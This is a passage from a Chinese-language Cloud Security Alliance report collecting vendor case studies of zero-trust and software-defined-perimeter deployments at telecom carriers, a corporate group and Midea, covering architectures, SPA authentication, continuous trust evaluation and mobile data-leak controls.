管控、持续认证、动态授权、威胁发现与动态处理的闭环操作,实现企业业务场
景的动态安全,解决当今企业 IT 环境下的业务风险问题。
在某运营商零信任业务安全解决方案项目落地过程中,实施部署遵循松耦合、
模块化的原则,需保证与传统的纵深体系没冲突,而是互补和增强;同样的安全
模型可以在云上进行构建;项目落地后除了安全性能提升以外,要兼顾用户体验。
具体建设需求总结:
1. 移动端多因素认证
采用密钥分割、设备指纹、白盒算法、环境清场等技术,与移动安全认证系
统协同,实现在移动终端的密钥、数字证书全生命周期管理及密码运算。
2. 企业身份管理平台(EnIAM)
增加应用资源动态访问控制功能,实时监控用户所有业务行为,连续自适应
©2021 云安全联盟大中华区-版权所有
91
风险与信任评估,能够适应复杂组织架构的用户角色,实现分级管理、细粒度授
权等功能。并且能够根据用户客户端的安全环境和自然环境(如:时间、地点登
录)确定用户使用何种认证方式是最优的,并根据风险情况自动调整认证策略,
解决企业内部身份统一管理难题。
3. 零信任业务安全平台(SDP)
对网络环境中所有用户采取“零信任”的态度,针对前期收集的用户信息,
在已有规则基础上,针对实际业务特点开发定制深入的违规检测规则;持续通过
信任引擎对用户、设备、访问及权限进行风险评估,实现动态访问控制。
4. 零信任风控决策引擎
即引入人工智能引擎,针对用户行为习惯进行大数据分析并根据业务场景建
模,通过历史数据发现新规则,建立与专家规则互补并行的分析评估引擎。
5. 国产化
所用技术以及产品系统均符合国产化要求,使用国密算法并兼容国产化芯片
及操作系统。
零信任业务安全解决方案实现效果:
1.远程办公
不再区分内外网,在人员、设备及业务之间构建基于身份的逻辑边界,针对
不同场景实现一体化的动态访问控制体系,不仅可以减少攻击暴露面,增强对企
业应用和数据的保护,还可通过现有工具的集成大幅降低零信任潜在建设成本,
满足员工任意时间、任意地点、任意设备安全可控的访问业务
2.多云/多分支环境
企业使用本地服务、云计算等技术架构,构建多分支跨地域访问,导致企业
服务环境越来越复杂,通过零信任访问代理网关将访问流量统一管控,基于动态
的虚拟身份边界,并通过计算身份感知等风险信息,建立最小访问权限动态访问
控制体系,这样可以极大的减少企业内部资产被非法授权访问的行为,实现在任
意分支机构网络环境下的内部资源访问
3.护网/攻防
随着大数据、物联网、云计算的快速发展,愈演愈烈的网络攻击已经成为国
家安全的新挑战,护网或攻防已逐步常态化、持续化,范围越来越广。护网或攻
©2021 云安全联盟大中华区-版权所有
92
防的核心目的是寻找网络安全中脆弱的环节,从而提升安全建设能力。通过“网
络隐身”技术,对外隐藏业务系统,防止攻击方对业务系统资产的收集和攻击,
进而确保业务系统的安全
4.跨企业协同
企业有时需要第三方合作伙伴为其提供服务,实现数据或服务共享,开放的
业务系统为企业带来极大的安全隐患,通过零信任网关,对外隐藏业务服务,针
对协同的合作伙伴进行有效的权限管控,安全审计和可控的访问通道,确保业务
和数据安全。
图 1
从建设零信任安全网络的角度来看,在完成基础网络体系后,根据自身特点
和业务情况逐步有序的进行建设。另外,在建设零信任安全网络的过程中,随着
控制节点的增加,正常员工和外部用户的访问体验趋向于无感知,但对恶意用户
而言是愈加严厉的认证策略。
18.3 优势特点和应用价值
1.资源隐藏,基于 SPA 协议进行预认证,并与动态访问控制平台协同,实现
©2021 云安全联盟大中华区-版权所有
93
应用预授权列表下发。
2.高强度设备指纹,采用设备硬件和相似度模型相结合的自主研发专利算法,
完美适配主流机型,经过上亿现网用户使用认证无误。
3.满足合规要求,适配国产化芯片、操作系统、数据库,同时满足国密改造
需求。
4.无需业务改造,通过零信任网关代理业务应用,支持业务系统无改造的情
况下,完成单点登录、细粒度授权、基于风险的动态授权等。
5.多因素认证,支持移动端多种认证方式,包括扫码、动态令牌、人脸、指
纹等 10+认证方式。
6.持续信任计算,基于规则引擎与机器学习引擎高效联动,实时计算访问的
风险等级。
7)细粒度访问控制策略,按需配置所需权限,最小权限原则,动态调整访
问策略
18.4 经验总结
在项目实施过程中,整个项目团队与客户紧密合作、积极沟通并分析探讨业
务场景,创新并解决疑难问题。
芯盾时代坚持服务用户应该以人为本,用技术持续推动,全流程保障用户的
业务安全。大量用户的累积证明专业的技术服务能力+优质的产品功能+高效专业
的售后保障才是获得用户青睐的原因,将用户放在第一位、将需求放在第一位、
将服务放在第一位才能加快市场推广进度。
19、云深互联零信任/SDP 安全在电信运营
商行业的实践案例
19.1 方案背景
电信运营商营业厅的业务支撑系统的安全访问一直以来都存在诸多挑战。
©2021 云安全联盟大中华区-版权所有
94
由于营业厅地理位置分散、人员结构复杂等因素,运营商通常把某些支撑系统
开放在公网上直接访问,某些系统通过 VPN 来拨网访问。然而,这样给安全运
维部门带来很大的困扰。以国内某大型省级运营商为例,该运营商将营业厅常
用的 10 多个业务系统(包括:2G/3G/4G 移动客户端体验管理平台、综合外呼平
台、渠道销售实况监控、BSS3.0 等)开放在公网上。如图 1 所示。
图 1 客户现状问题
这种方式面临如下的安全挑战:
1.攻击面暴露
暴露公网上业务服务器、VPN 服务器经常受到来自全球各地黑客的网络爬虫
以及黑客的 7x24 小时的扫描和攻击。这些核心业务支撑系统一旦被黑客扫描和
攻破,则将会给运营商企业带来巨大的损失和造成不良的社会影响。
2.运维复杂
访问业务支撑系统的的人员结构比较复杂,包括员工、装维人员、渠道代理
商、外呼人员、施工监理单位等“四方”人员。由于每个人的电脑水平参差不齐,
VPN 经常性的掉线给运维部门带来很大的负担,而且 VPN 也可能会把设备上的恶
意软件引入内网。此外,VPN 对于权限的分配和管理难度极大,很难进行精细化
授权管理,导致可能访问权限被滥用,造成数据泄露。
3.设备安全风险高
由于人员结构复杂,办公电脑上的软件环境无法严格管控。加上业务人员的
电脑水平普遍较低,极有可能中了病毒也未必及时发现。终端电脑上的病毒木马
©2021 云安全联盟大中华区-版权所有
95
不断会窃取终端的数据,而且会通过 VPN 通道渗透进内网,进而造成严重的安全
风险。
4.弱口令导致账号劫持
代理商、上下游供应商的员工安全意识薄弱,登录验证的方式较为单一,容
易发生被黑客撞库攻击。
19.2 方案概述
深云 SDP 解决方案是一个基于零信任网络安全理念和软件定义边界(SDP)
网络安全模型构建的业务系统安全访问解决方案。方案基于互联网或各类专网分
别建立以授权终端为边界的针对特定应用的虚拟网络安全边界,基于用户身份提
供特定应用的最小访问权限;对于特定应用对虚拟边界以外的用户屏蔽网络连接,
同时在传统网络安全设备上最大化设置严谨的安全策略以减少隐患、最小化开放
网络端口以减少因为网络协议自身漏洞造成的攻击,可有效缩小网络攻击面,提
高全域网络安全。
深云 SDP 包含三个组件----深云 SDP 客户端、深云 SDP 安全大脑、深云隐盾
网关(如图 2 所示):
图 2 深云 SDP 三大组件
©2021 云安全联盟大中华区-版权所有
96
1.深云 SDP 客户端
深云 SDP 客户端主要面向企业办公场景,为保护数据安全、提升工作效率而
设计,全面支持企业当前 C/S 及 B/S 应用。在深云 SDP 中,深云 SDP 客户端用
来做各种的身份验证,包括硬件身份,软件身份,生物身份等。
2.深云 SDP 安全大脑
深云 SDP 安全大脑是一个管理控制台,用来对所有的深云 SDP 客户端进行管
理,制定安全策略。深云 SDP 安全大脑还可以与企业已有的身份管理系统对接。
3.深云隐盾网关
所有对业务系统的访问都要经过 SDP 网关的验证和过滤,实现业务系统的
“网络隐身”效果。
深云 SDP 可以有效解决应用上云带来的安全隐患,减少业务系统在互联网上
的暴露面,让业务系统只对授权的深云 SDP 客户端可见,对其他工具完全不可见,
以避免企业的核心应用和数据成为黑客的攻击目标,保护企业的核心数据资产
(如图 3 所示)。
图 3 深云 SDP 解决方案
深云 SDP 部署在 DMZ 和云资源池,业务系统分别部署在内网和云资源池,外
网用户通过隐盾网关访问业务系统。部署架构如图 4 所示
©2021 云安全联盟大中华区-版权所有
97
图 4 部署架构图实践。
19.3 优势特点
1.网络隐身、最小化攻击面
深云隐盾网关实现了将 10 多个业务系统从互联网上彻底“隐身”。另外在
内部及外部开展的威胁监测处置工作中,持续对深云 SDP 进行安全监测,目前
为止未发现任何安全风险的出现。
2.按需授权,细粒度授权控制
深云 SDP 安全大脑对业务人员进行细粒度的访问控制,具体到哪些人员可
以访问哪些业务系统,只有拥有相对应业务系统授权的用户才能够访问相对应的
业务系统,其余无授权的业务系统,无法进行访问。此外,通过深云 SDP 企业
浏览器还可以控制用户是否可以进行复制、下载等操作。
3.身份安全增强
深云 SDP 客户端通过短信验证、硬件设备绑定等功能,使原来业务系统的
身份验证更加安全。
4.提升效率,降低运维成本
深云 SDP 摈弃了传统 VPN 长连接的模式,因此不会掉线,上手简单,同时还
有 SDP 安全大脑进行远程管理升级,提升了工作效率的同时又降低了运维成本。
5.高并发,稳定运行
深云 SDP 自上线实施后,每天支撑营业厅超过一万以上的业务人员同时办
公,保障每天数千万元的业务操作的安全。
注:本案例为 2020 年案例
©2021 云安全联盟大中华区-版权所有
98
20、启明星辰中国移动某公司远程办公安全
接入方案
20.1 方案背景
电信运营商作为大体量通信骨干企业,承担着国家基础设施建设责任,具备
为全球客户提供跨地域、全业务的综合信息服务能力和客户服务渠道体系。电信
运营商安全体系建设相对于其他行业,具有专业深、覆盖广、安全能力丰富等特
点,整体覆盖数据安全、应用安全、网络安全、基础安全等多方面。始终以搭建
体系化、常态化、实战化的安全防护体系为抓手。尤其是在账号、权限的统一管
理上,已经搭建了一套 4A 平台上,建设了一套适合电信运营商自身业务发展的
统一安全管理平台。
但随着互联网与电信网的融合、新技术新业务的发展、传统业务模式与新业
务模式并存使得业务网络复杂性增加、人员的复杂性增加,进而显现了诸多安全
隐患。同时电信运营商安全体系面临的外部网络攻击事件数量持续上升,外部网
络攻击的方式愈加智能化、体系化、有组织化。这两方面因素,给电信运营商安
全体系建设带来的巨大的挑战,如:
1.终端接入风险,终端的安全防护能力参差不齐,由于未安装或及时更新安
全防护软件,未启用适当的安全策略,被植入恶意软件等原因,可能将权限滥用、
数据泄露、恶意病毒等风险引入内部网络。
2.人员结构复杂风险,内部业务系统越来越多,人员访问造成的泄密风险增
加。
3.对外业务风险,部分业务暴露在会联网上的同时,也会暴露一些高危的漏
洞,因此很有很能危及内部业务系统。
4.对内业务风险,数据的集中,大数据技术的应用,使数据成为更容易被“发
现”的大目标,数据安全成为安全防护的重点,如用户的的非授权操作、越权操
作、脱库、爬库等行为将会导致数据中心的敏感数据被非法获取。
©2021 云安全联盟大中华区-版权所有
99
20.2 方案概述和应用场景
电信运营商很早就意识到数据安全防护的重要性,在面临接入人员结构复杂、
对接的设备和应用多、分布范围广、数据量巨大的问题上,通过抓住第一道安全
访问关口,即:对人员身份、接入设备的身份进行验证,确保每一个接入平台人
员和设备都是安全可信,拒绝未通过认证的任何人员或实体设备入网,此 4A 安
全管控平台的诞生。
4A 安全管控平台自 2008 年建立,通过与绕行阻断结合,建设一套以身份为
中心的,基于身份的认证、授权、审计体系,使得所有账号以及操作可管、可控、
可审。电信运营商 4A 访问层次主体为人员和设备,客体为应用、服务器、数据
库。整体架构分为控制层和能力执行层,控制层主要以安全统一管理为主,包括
统一证管理、统一账号管理、统一授权管理、统一资源管理、统一策略管理、统
一金库管理、统一审计管理、安全运营管理。执行层主要体现到具体的用户的执
行操作。比如某用户执行某个敏感操作,会触发某某金库的动作,其操作是由执
行层去执行的。
图 1 4A 安全管控平台信任逻辑示意图
4A 安全管控平台:
1.统一认证,先认证,后连接,作为主体访问客体的唯一路径,包括单点登
©2021 云安全联盟大中华区-版权所有
100
录、强身份认证、集中认证、认证安全性控制;
2.统一账号管理,客体账号管理,包括主从账号管理、特权账号管理、密码
策略管理、账号安全性控制;
3.统一授权控制,按照 RBAC 权限管理,原子授权、实体级授权、角色级授
权、细粒度授权,以及针对高危数据操作场景和敏感数据访问场景的二次化授权
金库控制、基于敏感操作的敏感数据实时脱敏控制、水印等;
4.统一审计管理,基于规则分析、关联分析、统计分析、实施分析、建模分
析技术,以数据为中心,针对所有在网用户操作审计。
零信任架构,可解释“从零开始建立信任”,“零”是“尽可能小”的相对概
念,而非“无或没有”这样的绝对概念。零信任架构打破了传统的认证即信任、
边界防护、静态访问控制、以网络为中心等防护思路,建立起一套以身份为中心,
以识别、持续认证、动态访问控制、授权、审计以及监测为链条,以最小化实时
授权为核心,以多维信任算法为基础,认证达末端的动态安全架构。
零信任架构的关键在于持续不断的去分析终端、环境、行为的风险或是证明
网络中“我是我”(这个“我”指的是网络中存在的访问主体)的问题。它通过
一系列的动作或参数去评估网络中的“我”是否是“我”,是否是“我”在操作,
“我”所处的网络环境存在怎样的安全风险,“我”是否有权限操作等的问题。
总体概括就是一个持续认证和动态授权的过程。
图 2 零信任架构逻辑示意图
©2021 云安全联盟大中华区-版权所有
101
零信任架构通过改变原有的静态认证和静态的权限控制的方法,用一种新的
持续的可度量的风险参数作为评判的依据,加入到访问主体的过程中,以达到网
络访问的可信,实现整个零信任架构的建设。
零信任架构与电信运营商建设的 4A 平台的建设理念如出一辙,电信运营商
限制所有账号的登录路径,这使得管控的访问入口更集中,用户必须通过先认证
后连接的方式才能访问到具体的资源权限,其次,4A 针对每个实体账号设置独
立的细粒度化的访问权限,为了操作的安全性,在敏感操作或是高危操作情况下
需要进行二次授权金库控制,最后,4A 对所有的用户行为进行审计,及时发现
未授权操作违规行为、越权操作行为、未经金库审批行为、非涉敏人员访问涉敏
权限违规行为等。通过事前、事中、事后多维控制,建设构建面向关键信息基础
设施的集中化安全管理。
4A 到零信任架构,能力进一步提升,主要体现在:
1.在 4A 认证的基础上+访问网络隐藏、通道加密、可信接入组件
4A 的认证管理模块包括了强身份认证、单点登录、基于 IP、Mac 地址和时
间段的认证安全访问方式,以及先认证后连接的机制。零信任主要在 4A 的认证
基础上进行了扩展,增加了网络隐藏机制,将被保护的资源隐藏,通道加密,缓
解了中间人渗透攻击、数据泄露等风险,零信任中的可信接入,将原有 4A 基于
IP、MAC、时间信息的认证访问方式,进行了强化,通过一种可度量的计算方法,
应用到认证过程中,实现对访问主体运行状态的周期性信任评估,从而确定账号
的唯一性和有效性。如,当终端开发高危端口时,或是未安装杀毒软件,信任评
估中心根据终端环境持续做分析,当安全分值未达标时,则不允许进行访问。
2.在账号的基础上+终端环境感知
零信任架构中,判断用户的信息不再以账号和密码为唯一基准,在日常运维
和业务操作中,单一的判断标准会出现账号共用的行为,即多个用户使用同一账
号,共享账号会给审计带来很大的影响,同时如果用户终端出现问题,存在病毒
之类,会将风向带入内网。零信任正是摒弃了这种单一的判断依据,通过针对访
问客体建立详细的终端指纹信息,终端环境状态的判断,从而判断其访问客体的
有效性。终端环境包括,采集运行进程状态、注册表、系统版本、关键文件存在
与否等环境信息。
©2021 云安全联盟大中华区-版权所有
102
3.在静态权限基础上+动态权限控制
4A 的权限控制都是基于静态的授权或是策略进行控制。零信任主要通过改
变原有的静态的权限控制的方法,用一种新的持续的可度量的风险参数作为评判
的依据,加入到访问主体中,作为客体访问的依据,以达到网络访问的可信,实
现整个零信任架构的建设。
4.在审计基础上+基于用户行为的实时分析能力
4A 的审计都属于事后行为审计,即违规行为已经发生,而零信任的本质是
将事后行为审计提前,通过大数据分析技术,针对每个访问主体提前预制行为基
线,将访问行为框定到具体的操作行为范围内,当访问主体发生异常操作时候,
通过用户行为实时分析模块,针对访问主体操作进行控制,已达到动态授权的行
为。由于电信运营商各自的业务特点,以及业务访问需求,需结合自身实际情况,
以及管理要求,酌情进行控制。
通过差距分析,再结合 4A 平台,构建了电信运营商独有的零信任架构,打
破传统以“人”为中心的认证方式,构建以“人+设备+环境”的认证体系,即统
一安全管理平台(4A)+持续、动态的“用户+设备(环境)”的检测与授权,实
现访问主体的身份可信,确保数据安全访问,达到对数据“可用可见、可用不可
见、不可用不可见”等状态的统一安全管控。
图 3
零信任架构包括零信任客户端、零信任网关、安全管控中心(4A)、以及信
©2021 云安全联盟大中华区-版权所有
103
任评估中心。
1)零信任客户端,实现单点登录、终端采集和链路加密;
2)零信任网关,执行组件,包括可信接入网关、可信运维网关、可信 API
网关,提供网络隐藏和应用系统访问入口,主要做认证和访问策略执行,提供身
份的零信任策略执行、访问的零信任策略执行、提供动态访问控制处置和应用系
统访问代理,以保证应用访问的安全性;
3)安全管控中心,在原有 4A 的账号、认证、授权、审计基础上,增加访问
控制服务,以实现动态身份管理控制、动态权限控制、终端访问控制等策略;
4)信任评估引擎,零信任架构中实现持续信任等级评估能力的核心组件,
和访问控制引擎联动,持续为其提供主体信任度评估,作为访问控制策略判定依
据。
20.3 优势特点和应用价值
1.让数据更安全
针对业务访问、办公访问、运维访问等不同场景,零信任从数据的采集、存
储、传输、处理、交换、销毁等维度,采用能够根据数据的敏感程度和重要程度
进行细粒度的授权,并结合人员的行为分析和访问的环境状态动态授权,在不影
响效率的前提下,确保数据访问权限最小化原则,避免因为权限不当导致的数据
泄露,从而让数据更安全。
2.让办公更便捷
随着全球化进程的推进,大型公司全球多地协同办公的现象很普遍,零信任
通过分布式、弹性扩容、自动容灾、终端环境感知等技术,解决了多地办公性能
问题、时差问题及安全与用户体验的矛盾,从而让办公更便捷。
3.应对演习更从容
近年来,网络演习活动在各监管机构、主管部门的组织下,呈现出常态化趋
势。社工、近源攻击等高级渗透手段也屡见不鲜,红方攻击人员一旦进入蓝方内
网,或拿到了蓝方人员的弱口令,将对蓝方的防守工作造成巨大威胁。演习期间,
蓝方人员往往杯弓蛇影,压力巨大,甚至不惜下线正常业务。
零信任架构立足于 SPA+默认丢包策略,网络连接按需动态开放,体系设计
©2021 云安全联盟大中华区-版权所有
104
满足先认证后连接原则,在网络上对非授权接入主体无暴露面,极大的消减网络
攻击威胁。除此之外,需合法用户使用合法设备,且在合法设备的安全基线满足
预设条件的情况下,接入主体的身份才被判定为可信。可有效防护多种网络攻击
行为,从而让蓝方防守更有效。
20.4 经验总结
目前项目已经完成实施部署,但是还存在一些问题,一方面主要体现到持续
的动态授权认证和授权方面,还需要针对具体的场景进行分析、细化数据访问控
制,比如远程登录访问敏感数据场景、批量下载敏感数据场景等,在落地实施时
候,需要同时关注针对数据的分级分类,制定相应的策略防护,同时结合行为实
时分析,才共同支撑零信任动态授权;一方面是在推广层面,零信任会增加针对
终端的信任评估内容,依据终端采集的信息进行相应评分,评估终端是否能够按
照要求接入。所以在推广时,会遇到各种登录不上去的问题,解决办法,需要制
定相关的制度要求,以及相应的手段进行落地。
21、指掌易某集团灵犀·SDP 零信任解决方
案
21.1 方案背景
随着移动信息化的高速发展,以智能手机,智能平板为代表的移动智能设备
逐步深入到企业办公领域。基于当前移动办公的趋势,某集团也逐步将业务从
PC 端向移动端进行迁移。一方面,移动技术的发展让移动办公成为常态,疫情
进一步加速了移动办公、线上协作的常态化进程。另一方面,为使线上协作、移
动办公更高效便捷,越来越多的应用和数据在互联网上发布,数据和应用访问面
临更高的风险。
随着数字化转型的不断深入,某集团将越来越多的核心应用迁移到云计算平
台和互联网,企业的服务范围已经远远超出了原有内部网络边界,企业业务系统
©2021 云安全联盟大中华区-版权所有
105
走向了更开放的生态模式,由此面临的来自互联网的恶意威胁越来越大。主要包
括:
1.员工自带设备办公,存在数据泄露风险
大部分员工使用自带的手机、笔记本进行移动/远程办公,企业数据在不可
控的个人设备上面临以下风险:办公过程中,难免会流转敏感文件,若被员工下
载到个人设备中、随意转发到互联网,会造成敏感文件泄露事件;业务应用展现
了重大审批流程、公司等,一旦被拷贝、截屏并转发到微信等社交平台上,损失
将不可估量。
2.业务应用服务器暴露在互联网上,终端、应用与某集团内网业务服务器之
间通过互联网连接方式,网络无边界、接入无认证,将业务数据置于随时能被攻
击或截获的环境中,存在很大的安全隐患。
综上,传统的安全方案已经不能满足企业要求。多种因素促使该企业一直在
寻求更完善的信息安全解决方案,有效防护企业 IT 资产和数据安全,并帮助全
球员工安全地接入业务系统,便捷的开展日常工作。
21.2 方案概述和应用场景
某集团业务种类众多、数据资产庞大,且已经构建了复杂的网络体系,企业
网络安全防护体系在满足业务发展需求的同时,面对应用实践仍然较少的零信任
理念转型需求,如何保障数据的合法合规访问和使用,以及如何选择最贴切集团
业务安全需求的方案提供商成为重要挑战。指掌易在详细了解了该集团客户所面
临的的挑战和实际需求之后,为客户提供了一套切实可行的零信任解决方案。通
过一年多的持续考察论证,某集团的零信任网络架构建设已经取得了显著的成效。
©2021 云安全联盟大中华区-版权所有
106
图 1
指掌易 SDP 零信任解决方案基于零信任模型实现,以基于身份的细粒度访问
代替广泛的网络接入,为用户提供安全可靠的访问业务系统方案。帮助客户实现
OA、门户、邮件等办公系统在互联网上进行隐身,同时要求基于零信任理念,保
证员工在内、外网访问办公系统时,都必须首先通过零信任系统进行认证,避免
以往当员工处于内网时的隐形信任问题。
指掌易通过和集团现有 IAM 系统进行对接,保证在 PC 端和移动端是实现用
户的统一身份认证及 SSO 单点登录机制。
图 2 指掌易零信任整体解决方案架构图
本项目总体设计架构图如上图所示,指掌易 MBS 移动业务智能安全平台是一
套“云-管-端”三位一体构建立体纵深的移动设备、业务的安全防护、管理运维
的综合平台。平台主要由安全工作空间、SDP(软件定义边界)零信任接入网关、
©2021 云安全联盟大中华区-版权所有
107
运维管理平台三部分组成。
MBS 移动业务智能安全平台支持在 Android 和 iOS 移动设备上,建立移动安
全工作空间,实现个人数据和企业数据的完全隔离,实现应用级的 DLP 策略,如
应用水印、禁止复制粘贴、禁止截屏等功能,所有集团内部办公应用可以发布在
安全工作空间内的应用商店中。
MBS 移动业务智能安全平台支持在 Windows 和 Mac 系统上安装 PC 安全浏览
器,在安全浏览器內可以实现包括水印、禁止复制、禁止另存为等功能。
支持多类型终端通过 SDP(软件定义边界)方式连接入某集团内网,外网员
工通过部署在新、老 DMZ 区的不同 SDP 网关接入内网业务系统,内网员工通过部
署在内网的 SDP 网关连接到业务系统。所有员工访问内网业务系统都需要首先通
过 SDP 认证。
通过运维平台,能够实现态势感知、运维审计等功能,支持对攻击行为、应
用情况、用户情况、设备情况等进行记录和审计。
1.零信任安全接入
图 3
指掌易 SDP 安全网关解决方案由客户端、安全网关和控制器三大组件构成。
SDP 客户端负责用户身份认证,周期性的检测上报设备、网络等环境信息,为用
户提供安全接入的统一入口。SDP 控制器负责身份认证,访问策略和安全策略分
发,并持续对用户进行信任等级的动态评估,根据评估结果动态调整用户权限,
并对用户的接入、访问等行为进行全面的统计分析。SDP 安全网关根据控制器的
策略与客户端建立安全加密的数据传输通道。
©2021 云安全联盟大中华区-版权所有
108
1)网络隐身避免外部攻击
关键的应用服务端口不再向外暴露,由零信任网关代理访问。基于 UDP 协议
的 SPA 单包授权认证机制,默认“拒绝一切”请求,仅在接收到合法的认证数据
包的情况下,对用户身份进行认证,对非法 SPA 包默认丢弃。认证通过后,接入
终端和网关之间建立基于 UDP 协议的加密隧道,支持抗中间人攻击、重放攻击等。
SPA 协议和加密隧道协议技术实现对外关闭所有的 TCP 端口,保证了潜在的网络
攻击者嗅探不到灵犀 SDP 安全网关的端口,无法对网关进行扫描,预防网络攻击
行为,有效地减少互联网暴露面。
2)可信接入实现安全访问
根据“零信任”的安全理念,通过对包括用户、设备、网络、时间、位置等
多因素的身份信息进行验证,确认身份的可信度和可靠性。在默认不可信的前提
下,只有全部身份信息符合安全要求,才能够认证通过,客户端才能够与安全网
关建立加密的隧道连接,由安全网关代理可访问的服务。针对异地登录、新设备
登录的等风险行为,系统将追加二次验证,防止账号信息泄露而导致的内网入侵。
3)零信任环境检测
包括进行身份信息检测、设备信息检测、访问位置信息检测、访问网络信息
检测、访问时间信息检测等。
4)最小化授权
图 4
当用户行为或环境发生变化时,指掌易 SDP 会持续监视上下文,基于位置、
时间、安全状态和一些自定义属性实施访问控制管理。通过用户身份、终端类型、
©2021 云安全联盟大中华区-版权所有
109
设备属性、接入方式、接入位置、接入时间来感知用户的访问上下文行为,并动
态调整用户信任级别。
对于同一用户需要设定其最小业务集及最大业务集,对于每次访问,基于用
户属性、职务、业务组、操作系统安全级别等进行安全等级评估,按照其安全等
级,进行对应的业务系统访问。
5)零信任持续认证
通过强大的身份服务来确保每个用户的访问,一旦身份验证通过,并能证明
自己设备的完整性,赋予对应权限访问资源。SDP 进行持续的自适应风险与信任
评估,信任度和风险级别会随着时间和空间发生变化,根据安全等级的要求、网
络环境等因素,达到信任和风险的平衡。
指掌易 SDP 零信任解决方案架构中,所有用户的请求都必须通过组织信任的
设备发起,用户的身份需要鉴定确认是否合法,并且通过遵循控制端下发的安全
策略才能访问隐藏在安全网关后面的特定的内部资源。
在持续认证过程中,通过上下文分析和基于计分的信任算法提供更加动态和
细粒度的访问控制能力。
2.安全工作空间
针对集团员工的 BYOD 办公场景,基于指掌易自主研发的 VSA 技术,无需获
取应用源代码、无需对操作系统进行 Root 或越狱情况下,对应用进行容器化,
建立一个可管理的、相对隔离的安全工作空间,作为构建在应用和系统、应用和
应用之间的桥梁。集团内部的办公应用均通过应用商店下发和安装到安全工作空
间内。安全办公空间内的办公应用和数据与空间外的个人应用和数据相互隔离,
个人应用无法访问办公应用和数据,保障办公应用的安全。同时,安全工作空间
通过容器化封装对办公应用提供数据防泄漏能力,防止应用层数据外泄。DLP 赋
能企业移动业务,无需改造移动 APP。提供包括应用水印、截屏/录屏保护、复
制黏贴保护、数据/文件保护、数据隔离、应用数据透明加解密等安全保护策略。
3.态势感知
支持对用户、设备、应用、网络攻击、服务器状态等信息的统计、分析、上
报能力。能够对用户情况、设备类型、数量、应用安装情况、使用情况、网络攻
击类型、IP 地址、攻击来源等进行分析展示,帮助客户了解各类信息。
©2021 云安全联盟大中华区-版权所有
110
21.3 优势特点和应用价值
1.安全工作空间
提供移动化办公统一协作空间和应用入口,基于指掌易独创的 VSA(虚拟安
全域)技术,支持在移动设备上创建虚拟的安全工作空间。在 BYOD 场景中,实
现用户个人数据与工作业务数据的安全隔离,既保障了工作数据的安全性,同时
极大提升了移动办公的用户体验。实现了一个设备兼备“个人”和“工作”两套
“区域”,兼顾工作数据安全以及个人生活隐私。
2.基于“零信任理念”的安全接入系统
围绕无边界零信任网络安全架构理念建设安全网关,零信任安全针对传统边
界安全架构思想进行了重新评估和审视,并对安全架构思路给出了新的建议,零
信任架构建议组织围绕业务系统创建一种以身份为中心的全新边界,旨在解决
“基于网络边界建立信任”这种理念本身固有的安全问题。零信任模型不再基于
网络位置建立信任,而是在不依赖网络传输层安全机制的前提下,有效地保护网
络通信和业务访问。
3.轻量化安全框架
轻量化的移动安全框架,适配 99%的应用及近千款主流移动设备,移动应用
安全封装后安全控制能力近百项,同时支持 Android、iOS 两大主流移动平台。
开箱即用,简化配置,无需繁琐的设备注册,增强移动办公效率。打消 BYOD 场
景中个人用户对安装使用安全保护应用,可能造成个人隐私信息泄露等众多疑虑,
降低移动办公安全的推进难度。
4.高可扩展性设计
系统支持高可用集群部署,具有合理、高效、灵活的体系结构,便于管理系
统的处理能力、容量的扩充、以及多种业务的接入。支持企业移动业务不断新增
扩展,安全能力向后兼容,不断扩展新的安全功能或能力,同步支持企业移动业
务安全赋能。
21.4 经验总结
零信任理念是未来企业网络安全防护体系的重要发展方向,从实施推进的具
©2021 云安全联盟大中华区-版权所有
111
体路径上,以及覆盖的业务系统范围来看,目前该集团的零信任架构重点关注于
OA 系统、邮件系统、移动办公平台等使用范围广泛,用户级别较高的业务,且
已经覆盖了庞大的用户群体。未来,可通过安全态势感知和智能、动态的安全策
略调整,逐步实现整体信息安全智能化,助力某集团构建全面信息化安全规划。
22、美云智数美的集团零信任实践案例
22.1 方案背景
在全球疫情驱动下,美的集团数字化工作空间,需要满足内部员工分布式接
入、合作伙伴、客户等各类人员,使用各类设备,从任何时间任何地点访问企业
服务资源及硬件资源,日常数据传输量大,网络环境不一致,业务资源复杂且分
散,集中管控难度变大,对于企业办公网络的稳定性、安全性、可控性提出了更
高要求,传统的边界网络(例如 VPN 等)解决方案越来越难以满足现在的需求。
业权一体化(BPI),让权限回归业务本质,让 IT 聚焦数字智能! 基于美云
智数自主研发的业权一体化产品,为每个应用系统和企业资源建立起一道权限安
全边界,通过策略授权、自动回收,动态鉴权,实现所有业务动作皆有权限控制
的安全屏障,根据用户业务需要自动开通,自助申请与审批,可见即有权,不需
要时权限自动取消回收,这些过程都由业务驱动自动完成。
Midea-BPI-SDP 项目,基于美云智数零信任网络平台构建一个全网互联的全
新身份化网络,该组件采用了软件定义边界(Software Defined Perimeter, SDP)
的安全框架,在用户中通过构建叠加虚拟网络(Overlay Network)的方式重建
以身份为中心的零信任安全体系,满足了企业当前无边界网络的安全需求,为客
户提供按需、动态的可信访问。即将分布于各地域环境下的数万个终端,以及部
署在各种云平台和数据中心的各类应用都接入到统一的安全网络,并采用端到端
加密方式跨越互联网进行业务访问,快速解决超大规模远程安全协同办公问题。
©2021 云安全联盟大中华区-版权所有
112
22.2 方案概述和应用场景
22.2.1 方案概述
Midea-BPI-SDP 由许多组件相互协作组成,确保只有通过严格认证的设备和
用户才能访 问被 授权 的企 业应 用服 务器和应 用。“图 1:总体架构 ”是
Midea-BPI-SDP 的解决方案总体架构示意图。
该方案通过基于传统的物理网络,构建基于 SDP 技术构建零信任安全叠加网
络 TM-Cloud,该叠加网络(Overlay)是由“信域客户端-TMA、信域网关-TMG、
信域控制台-TMG”组成。TM-Cloud 是一种在物理网络(Underlay)架构上叠加的
虚拟化网络的技术,具有独立的控制平面和数据平面,使终端资源、云资源、数
据中心资源摆脱了物理网络限制,更适合用在多云混合、云网互联网络环境中进
行统一集中的身份认证、授权与访问控制。只有通过叠加虚拟云网的认证的用户
和终端,才能访问到起上的应用服务(公有云,私有云,本地应用服务),在细
粒度权限管理层,通过 BPI(业权一体化)的支撑架构实现权限的弹性开放与回
收,以达到动态授权的目的。
图 1 总体架构
“图 2:SDP 架构”是 Midea-BPI-SDP 的解决方案中的 SDP(软件定义边界)
实现技术架构图。该架构方案解决了如下问题:
©2021 云安全联盟大中华区-版权所有
113
1.更强大的隐身能力
增强的 SDP 架构,客户无需任何公网 IP,所有业务系统和信域组件都隐藏
